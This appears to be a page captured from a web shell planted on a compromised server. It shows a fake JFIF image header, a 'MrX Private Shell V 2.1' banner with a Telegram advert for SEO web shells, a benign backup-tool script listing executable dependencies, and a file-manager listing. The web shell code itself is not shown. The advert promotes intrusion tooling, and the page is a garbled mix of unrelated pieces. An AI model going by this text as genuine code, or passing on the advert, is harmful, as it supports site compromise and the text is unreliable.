����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# List executables along with the shared libraries they depend on
#
# The resulting list can be used to determine which executables with a large footprint could be stripped from the
# TCG Opal pre-boot authentication (PBA) image
if is_true $KEEP_BUILD_DIR; then
executables=( $(cd "$ROOTFS_DIR"; find . -type f -executable -print | sort) )
executable_dependencies_list="$TMP_DIR/executable-dependencies"
for executable in "${executables[@]}"; do
dependents=( $(RequiredSharedObjects "$ROOTFS_DIR/$executable") )
echo "$executable: ${dependents[*]}"
done > "$executable_dependencies_list"
LogPrint "A list of executables with their dependencies has been stored in $executable_dependencies_list"
fi
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 095_exclude_non_essential_files.sh | File | 1.77 KB | 0644 |
|
| 105_reinclude_essential_files.sh | File | 288 B | 0644 |
|
| 106_remove_files_copied_unconditionally.sh | File | 610 B | 0644 |
|
| 391_list_executable_dependencies.sh | File | 736 B | 0644 |
|
| 810_deduplicate_files.sh | File | 1.16 KB | 0644 |
|
| 820_store_settings.sh | File | 865 B | 0644 |
|